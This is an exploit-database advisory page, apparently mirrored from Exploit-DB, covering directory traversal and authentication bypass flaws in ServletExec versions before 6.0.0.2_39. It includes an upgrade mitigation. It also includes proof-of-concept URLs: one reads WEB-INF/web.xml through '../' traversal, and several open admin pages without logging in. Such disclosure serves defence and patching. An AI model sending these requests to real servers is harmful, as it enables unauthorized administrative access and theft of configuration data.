header-logo
Suggest Exploit
vendor:
ServletExec
by:
7.5
CVSS
HIGH
Directory Traversal and Authentication Bypass
22
CWE
Product Name: ServletExec
Affected Version From:
Affected Version To: ServletExec versions prior to 6.0.0.2_39
Patch Exists: YES
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

ServletExec Directory Traversal and Authentication Bypass Vulnerabilities

The ServletExec application is vulnerable to a directory traversal vulnerability and multiple authentication bypass vulnerabilities. These vulnerabilities occur due to insufficient sanitization of user-supplied input. An attacker can exploit these vulnerabilities to gain administrative access to the affected application and retrieve sensitive information for further attacks.

Mitigation:

Upgrade to ServletExec 6.0.0.2_39 or later version.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/42411/info

ServletExec is prone to a directory-traversal vulnerability and multiple authentication-bypass vulnerabilities because the application fails to sufficiently sanitize user-supplied input.

Exploiting these issues may allow an attacker to gain administrative access to the affected application and to obtain sensitive information that could aid in further attacks.

Versions prior to ServletExec 6.0.0.2_39 are vulnerable. 

http://www.example.com/servlet/pagecompile._admin._help._helpContent_xjsp?page=../../WEB-INF/web.xml
http://www.example.com/servlet/pagecompile._admin._login_xjsp
http://www.example.com/servlet/pagecompile._admin._vmSystemProperties_xjsp
http://www.example.com/servlet/pagecompile._admin._SELogging_xjsp
http://www.example.com/servlet/pagecompile._admin._userMgt_xjsp
http://www.example.com/servlet/pagecompile._admin._virtualServers_xjsp
http://www.example.com/servlet/pagecompile._admin._optionalPackages_xjsp
http://www.example.com/servlet/pagecompile._admin._dataSources_xjsp
http://www.example.com/servlet/pagecompile._admin._debug_xjsp

Navigation

Suggest Exploit

Services By CQR